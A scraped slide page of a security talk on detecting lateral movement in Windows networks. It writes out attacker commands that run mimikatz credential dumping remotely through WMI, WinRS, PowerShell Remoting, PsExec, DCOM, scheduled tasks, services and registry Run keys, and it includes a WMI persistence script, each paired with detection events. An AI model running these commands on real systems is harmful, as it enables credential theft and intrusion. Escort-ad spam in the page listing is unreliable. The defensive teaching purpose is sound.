08448380779 Call Girls In Diplomatic Enclave Women Seeking Men
Delhi Call girls
 
CNv6 Instructor Chapter 6 Quality of Service
CNv6 Instructor Chapter 6 Quality of ServiceCNv6 Instructor Chapter 6 Quality of Service
CNv6 Instructor Chapter 6 Quality of Service
giselly40
 

Kürzlich hochgeladen (20)

How to convert PDF to text with Nanonets
How to convert PDF to text with NanonetsHow to convert PDF to text with Nanonets
How to convert PDF to text with Nanonets
 
🐬 The future of MySQL is Postgres 🐘
🐬 The future of MySQL is Postgres 🐘🐬 The future of MySQL is Postgres 🐘
🐬 The future of MySQL is Postgres 🐘
 
What Are The Drone Anti-jamming Systems Technology?
What Are The Drone Anti-jamming Systems Technology?What Are The Drone Anti-jamming Systems Technology?
What Are The Drone Anti-jamming Systems Technology?
 
Tech Trends Report 2024 Future Today Institute.pdf
Tech Trends Report 2024 Future Today Institute.pdfTech Trends Report 2024 Future Today Institute.pdf
Tech Trends Report 2024 Future Today Institute.pdf
 
Raspberry Pi 5: Challenges and Solutions in Bringing up an OpenGL/Vulkan Driv...
Raspberry Pi 5: Challenges and Solutions in Bringing up an OpenGL/Vulkan Driv...Raspberry Pi 5: Challenges and Solutions in Bringing up an OpenGL/Vulkan Driv...
Raspberry Pi 5: Challenges and Solutions in Bringing up an OpenGL/Vulkan Driv...
 
The Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdf
The Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdfThe Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdf
The Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdf
 
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...
 
How to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected WorkerHow to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected Worker
 
IAC 2024 - IA Fast Track to Search Focused AI Solutions
IAC 2024 - IA Fast Track to Search Focused AI SolutionsIAC 2024 - IA Fast Track to Search Focused AI Solutions
IAC 2024 - IA Fast Track to Search Focused AI Solutions
 
08448380779 Call Girls In Civil Lines Women Seeking Men
08448380779 Call Girls In Civil Lines Women Seeking Men08448380779 Call Girls In Civil Lines Women Seeking Men
08448380779 Call Girls In Civil Lines Women Seeking Men
 
The 7 Things I Know About Cyber Security After 25 Years | April 2024
The 7 Things I Know About Cyber Security After 25 Years | April 2024The 7 Things I Know About Cyber Security After 25 Years | April 2024
The 7 Things I Know About Cyber Security After 25 Years | April 2024
 
Axa Assurance Maroc - Insurer Innovation Award 2024
Axa Assurance Maroc - Insurer Innovation Award 2024Axa Assurance Maroc - Insurer Innovation Award 2024
Axa Assurance Maroc - Insurer Innovation Award 2024
 
04-2024-HHUG-Sales-and-Marketing-Alignment.pptx
04-2024-HHUG-Sales-and-Marketing-Alignment.pptx04-2024-HHUG-Sales-and-Marketing-Alignment.pptx
04-2024-HHUG-Sales-and-Marketing-Alignment.pptx
 
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
 
Artificial Intelligence: Facts and Myths
Artificial Intelligence: Facts and MythsArtificial Intelligence: Facts and Myths
Artificial Intelligence: Facts and Myths
 
08448380779 Call Girls In Diplomatic Enclave Women Seeking Men
08448380779 Call Girls In Diplomatic Enclave Women Seeking Men08448380779 Call Girls In Diplomatic Enclave Women Seeking Men
08448380779 Call Girls In Diplomatic Enclave Women Seeking Men
 
2024: Domino Containers - The Next Step. News from the Domino Container commu...
2024: Domino Containers - The Next Step. News from the Domino Container commu...2024: Domino Containers - The Next Step. News from the Domino Container commu...
2024: Domino Containers - The Next Step. News from the Domino Container commu...
 
[2024]Digital Global Overview Report 2024 Meltwater.pdf
[2024]Digital Global Overview Report 2024 Meltwater.pdf[2024]Digital Global Overview Report 2024 Meltwater.pdf
[2024]Digital Global Overview Report 2024 Meltwater.pdf
 
CNv6 Instructor Chapter 6 Quality of Service
CNv6 Instructor Chapter 6 Quality of ServiceCNv6 Instructor Chapter 6 Quality of Service
CNv6 Instructor Chapter 6 Quality of Service
 
presentation ICT roal in 21st century education
presentation ICT roal in 21st century educationpresentation ICT roal in 21st century education
presentation ICT roal in 21st century education
 

Kheirkhabarov24052017_phdays7

  • 1. Hunting Lateral Movement in Windows Infrastructure Teymur Kheirkhabarov
  • 2. Who Am I • Senior SOC Analyst @Kaspersky Lab • SibSAU (Krasnoyarsk) graduate • Ex- Infosec dept. head • Ex- Infosec admin • Ex- System admin • Twitter @HeirhabarovT • www.linkedin.com/in/teymur-kheirkhabarov-73490867/
  • 3. What are we going to talk about • Different ways to launch executables remotely by using compromised credentials and operating system functionality; • How to detect remotely launched executables with Windows Event and Sysmon logs.
  • 4. Remote file copy over SMB • Copy to autostart locations for execution on login or boot • Copy to different locations for further execution via WMI, WinRM, Powershell Remoting, Task Scheduler, Service… • Programmatically • Using Explorer • Using standard console tools (copy, xcopy, ropocopy…): • robocopy C:tools pc0002ADMIN$userspublic mimikatz.exe • powershell Copy-Item -Path mimikatz.exe -Destination pc0002C$userspublic • cmd /c "copy mimikatz.exe pc0002C$userspublic" • xcopy mimikatz.exe pc0002C$ProgramDataMicrosoftWindowsStart MenuProgramsStartup How • TCP/455 port is accessible on remote host • Administrative shares are enabled on remote host Requirements & limitations
  • 5. Remote File Copy over SMB – events sequence on destination side E2. Special privileges assigned to new logon (Windows EID 4672) E1. Network Logon (Windows EID 4624) E3. Administrative share access (Windows EID 5140/5145) E4. File object access with WriteData or AddFile rights (Windows EID 4663) – if audit and SACL were configured
  • 6. Remote File Copy over SMB – the most interesting events
  • 7. Hunting: search for administrative shares connections
  • 9. Hunting: search for files creation/changes in autostart locations
  • 10. Remote execution via WMI • Programmatically • Using standard tools: • wmic /node:pc0002 process call create "cmd /c C:UsersPublicmimikatz.exe privilege::debug sekurlsa::logonpasswords exit >> C:UsersPublicresult.txt" • powershell Invoke-WmiMethod -ComputerName pc0002 -Class Win32_Process - Name Create -ArgumentList '"cmd /c C:UsersPublicmimikatz.exe privilege::debug sekurlsa::logonpasswords exit >> C:UsersPublicresult.txt"' • powershell -command "&{$process = [WMICLASS]'pc0002ROOTCIMV2:win32_process'; $process.Create('calc.exe'); }" • powershell -command "&{$process = get-wmiobject -query 'SELECT * FROM Meta_Class WHERE __Class = "Win32_Process"' -namespace 'rootcimv2' - computername pc0002; $process.Create( 'notepad.exe' );}" How • TCP/135 port is accessible on remote host • RPC dynamic port range is accessible on remote host Requirements & limitations
  • 11. Remote execution via WMI – events sequence on destination side E2. Special privileges assigned to new logon (Windows EID 4672) E1. Network Logon (Windows EID 4624) E3. WmiPrvSE.exe starts payload file (Sysmon EID 1)
  • 12. Remote execution via WMI – the most interesting events
  • 13. Remote execution via WinRM • Programmatically • Using Windows Remote Shell (WinRS) tool: • winrs -r:pc0002.test.local C:UsersPublicmimikatz.exe privilege::debug sekurlsa::logonpasswords exit • winrs -r:pc0002.test.local -u:dadmin C:UsersPublicmimikatz.exe privilege::debug sekurlsa::logonpasswords exit How • WinRM is enabled on remote host (disabled by default on client Windows versions) • TCP/5985 (TCP/5986) port is accessible on remote host Requirements & limitations
  • 14. Remote execution via WinRM – events sequence on destination side E2. Special privileges assigned to new logon (Windows EID 4672) E1. Network Logon (Windows EID 4624) E3. svchost.exe starts WinrsHost.exe (Sysmon EID 1) E4. WinrsHost.exe starts payload file (Sysmon EID 1)
  • 15. Remote execution via WinRM – the most interesting events
  • 16. Remote execution via Powershell Remoting • Powershell scripts • Powershell cmdline: • powershell Invoke-Command -ComputerName pc0002.test.local -ScriptBlock {cmd /c C:UsersPublicmimikatz.exe privilege::debug sekurlsa::logonpasswords exit >> C:UsersPublicpc0002_mimikatz_output.txt } • powershell Invoke-Command -ComputerName pc0002.test.local -credential TESTdadmin -ScriptBlock {cmd /c C:UsersPublicmimikatz.exe privilege::debug sekurlsa::logonpasswords exit >> C:UsersPublicpc0002_mimikatz_output.txt } • Enter-PSSession -ComputerName COMPUTER -Credential USER How • WinRM is enabled on remote host (disabled by default on client Windows versions) • TCP/5985 (TCP/5986) port is accessible on remote host Requirements & limitations
  • 17. Remote execution via Powershell Remoting – events sequence on destination side E2. Special privileges assigned to new logon (Windows EID 4672) E1. Network Logon (Windows EID 4624) E3. svchost.exe starts wsmprovhost.exe (Sysmon EID 1) E4. wsmprovhost.exe starts payload file (Sysmon EID 1)
  • 18. Remote execution via Powershell Remoting – the most interesting events
  • 19. Remote execution via MMC20.Application COM How • Programmatically • Using powershell: powershell -command "&{$com=[activator]::CreateInstance([type]::GetTypeFromProgID('MMC20.Appli cation','pc0002.test.local')); $com.Document.ActiveView.ExecuteShellCommand('cmd.exe',$null,'/c C:UsersPublicmimikatz.exe privilege::debug sekurlsa::logonpasswords exit >> C:UsersPublicpc0002_mimikatz_output.txt','7')}" Requirements & limitations • TCP/135 port is accessible on remote host • RPC dynamic port range is accessible on remote host https://enigma0x3.net/2017/01/05/lateral-movement-using-the-mmc20-application-com-object/
  • 20. E2. Special privileges assigned to new logon (Windows EID 4672) E1. Network Logon (Windows EID 4624) E3. svchost.exe starts mmc.exe (Sysmon EID 1) E4. mmc.exe starts payload file (Sysmon EID 1) Remote execution via MMC20.Application COM – events sequence on destination side
  • 21. Remote execution via MMC20.Application COM – the most interesting events
  • 22. Remote execution via PsExec (& clones, e.g. PaExec) • PsExex: • psexec.exe pc0002 -c mimikatz.exe privilege::debug sekurlsa::logonpasswords exit • PaExec: • paexec.exe pc0002 -c mimikatz.exe privilege::debug sekurlsa::logonpasswords exit How • ADMIN$ administrative share is enabled on remote host • TCP/445 port is accessible on remote host Requirements & limitations
  • 23. E2. Special privileges assigned to new logon (Windows EID 4672) E1. Network Logon (Windows EID 4624) E3. Copying PSEXESVC.exe to ADMIN$ (Windows EID 5140/5145) E4. psexesvc service is installed and started (Windows EID 7045/7036) Remote execution via PsExec (& clones) – events sequence on destination side E5. psexesvc.exe is started by services.exe (Sysmon EID 1) E6. psexesvc.exe starts payload file (Sysmon EID 1) E7. Interaction with payload stdin/stdout/stderr via SMB pipes (Windows EID 5145)
  • 24. Remote execution via PsExec (& clones) – the most interesting events
  • 25. Hunting: search for PsExec (& clones) artifacts – services
  • 26. Hunting: search for PsExec (& clones) artifacts – access to pipes
  • 27. Remote execution via PsExec (& clones) – the most interesting events
  • 28. Hunting: search for executions in network logon sessions (WinRM, WMI, PsExec, Powershell Remoting, MMC20 COM)
  • 29. Remote execution via ShellWindows COM How • Programmatically • Using powershell: powershell -command "&{$obj = [activator]::CreateInstance([Type]::GetTypeFromCLSID('9BA05972-F6A8-11CF- A442-00A0C90A8F39','pc0002')); $obj.item().Document.Application.ShellExecute('cmd.exe','/c calc.exe','C:WindowsSystem32',$null,0)}" Requirements & limitations • TCP/135 port is accessible on remote host • RPC dynamic port range is accessible on remote host • Execution with rights of currently logged user https://enigma0x3.net/2017/01/23/lateral-movement-via-dcom-round-2/
  • 30. Remote execution via ShellBrowserWindow COM How • Programmatically • Using powershell: powershell -command "&{$obj = [activator]::CreateInstance([Type]::GetTypeFromCLSID('C08AFD90-F2A1-11D1- 8455-00A0C91F3880','pc0002')); $obj.Document.Application.ShellExecute('cmd.exe','/c calc.exe','C:WindowsSystem32',$null,0)}" Requirements & limitations • TCP/135 port is accessible on remote host • RPC dynamic port range is accessible on remote host • Doesn’t work for Windows 7 destination • Execution with rights of currently logged user https://enigma0x3.net/2017/01/23/lateral-movement-via-dcom-round-2/
  • 31. E2. Special privileges assigned to new logon (Windows EID 4672) E1. Network Logon (Windows EID 4624) Remote execution via ShellWindows or ShellBrowserWindow COM – events sequence on destination side E3. explorer.exe starts payload file in current session (Sysmon EID 1)
  • 32. Remote execution via via ShellWindows or ShellBrowserWindow COM – how to detect??? Payload file is executed in the session of the current active user
  • 33. Remote execution via Scheduled Tasks • Programmatically • Standard command line tools: • at 172.16.205.14 3:55 C:UsersPublicmimikatz.exe privilege::debug sekurlsa::logonpasswords exit >> win_mimikatz_output.txt • schtasks /create /S pc0002 /SC ONCE /ST 00:57:00 /TN "Adobe Update" /TR "cmd.exe /c C:userspublicmimikatz.exe privilege::debug sekurlsa::logonpasswords exit >> C:UsersPublicresult.txt" How • TCP/135 port and RPC dynamic port range are accessible on remote host (in case of Schtasks usage) • TCP/445 port is accessible on remote host (in case of AT usage) Requirements & limitations
  • 34. Remote execution via Scheduled Tasks – events sequence on destination side E2. Special privileges assigned to new logon (Windows EID 4672) E1. Network Logon (Windows EID 4624) E3. Access to atsvc SMB Pipe (Windows EID 5145) – in case of at.exe usage E6. taskeng.exe starts payload file (Sysmon EID 1) E4. Scheduled task is created or updated (Windows EID 4698/4702) E5. Task is triggered. svchost.exe starts taskeng.exe (Sysmon EID 1) Also there are some interesting events in Microsoft-Windows-TaskScheduler/Operational log
  • 35. Remote execution via Scheduled Tasks – the most interesting events
  • 36. Hunting: search for remotely created or updated scheduler tasks
  • 37. Remote execution via Scheduled Tasks – the most interesting events
  • 38. Hunting: search for ATSVC pipe connections
  • 39. Remote execution via Services • Programmatically • Standard command line tool: • sc pc0002 create "Remote service" binPath= "cmd /c C:UsersPublicmimikatz.exe privilege::debug sekurlsa::logonpasswords exit >> C:UsersPublicresult.txt" sc pc0002 start "Remote service" sc pc0002 delete »Remote service" How • TCP/135 port is accessible on remote host • RPC dynamic port range is accessible on remote host Requirements & limitations
  • 40. Remote execution via Services – events sequence on destination side E2. Special privileges assigned to new logon (Windows EID 4672) E1. Network Logon (Windows EID 4624) E3. New service is installed (Windows EID 7045/4697) E4. Start command is sent to installed service. services.exe starts payload file (Sysmon EID 1) E5. A timeout is reached (Windows EID 7009) E6. Failure while trying to start service (Windows EID 7000)
  • 41. Remote execution via Services – the most interesting events
  • 42. Hunting: search for remotely created services
  • 43. Remote registry How • Programmatically • Using powershell or reg: • reg add pc0002HKLMSOFTWAREMicrosoftWindowsCurrentVersionRun /f /v GoogleUpdater /t REG_SZ /d "cmd /c C:UsersPublicmimikatz.exe privilege::debug sekurlsa::logonpasswords exit >> C:UsersPublicresult.txt" • powershell -command "&{$reg=[Microsoft.Win32.RegistryKey]::OpenRemoteBaseKey("LocalMachin e", "pc0002"); $key=$reg.OpenSubKey("SOFTWAREMicrosoftWindowsCurrentVersionRu n",$True); $key.SetValue("GoogleUpdater","calc.exe");}" Requirements & limitations • TCP/445 port is accessible on remote host • Remote Registry service is enabled on remote host
  • 44. Remote registry – events sequence on destination side E2. Special privileges assigned to new logon (Windows EID 4672) E1. Network Logon (Windows EID 4624) E3. WINREG pipe access (Windows EID 5145) E4. Registry value is modified (Windows EID 4657) – if audit and SACL were configured
  • 45. Remote Registry – the most interesting events
  • 46. Hunting: search for WINREG pipe connections
  • 48. Hunting: search for changes in autostart registry keys
  • 49. Remote WMI subscriptions creation $filterName = 'TestFilter’ $consumerName = 'TestConsumer’ $exePath = 'C:WindowsSystem32calc.exe' $Query = "SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System' AND TargetInstance.SystemUpTime >= 200 AND TargetInstance.SystemUpTime < 320" $WMIEventFilter = Set-WmiInstance -ComputerName pc0002 -Class __EventFilter - NameSpace "rootsubscription" -Arguments @{Name=$filterName;EventNameSpace="rootcimv2";QueryLanguage="WQL";Query=$ Query} -ErrorAction Stop $WMIEventConsumer = Set-WmiInstance -ComputerName pc0002 -Class CommandLineEventConsumer -Namespace "rootsubscription" -Arguments @{Name=$consumerName;ExecutablePath=$exePath;CommandLineTemplate=$exePath} Set-WmiInstance -ComputerName pc0002 -Class __FilterToConsumerBinding -Namespace "rootsubscription" -Arguments @{Filter=$WMIEventFilter;Consumer=$WMIEventConsumer}
  • 51. Remote WMI subscriptions creation – events sequence on destination side E2. Special privileges assigned to new logon (Windows EID 4672) E1. Network Logon (Windows EID 4624) E3. Writing to WMI Namespace (Windows EID 4662) – if audit and SACL were configured
  • 52. Remote WMI subscriptions creation – the most interesting events
  • 53. The End  There are a lot of ways to remotely run executables in Windows infrastructure;  Most of them are based on the native capabilities of the Windows operating system;  Almost all of them can be detected via Windows or Sysmon logs analysis;  Out of scope: • exploitation of vulnerabilities; • third-party applications and software deployment systems (SCCM, Kaspersky Security Center, VNC, WSUS…).
  • 54. Teymur Kheirkhabarov • Twitter @HeirhabarovT • http://www.linkedin.com/in/teymur-kheirkhabarov-73490867/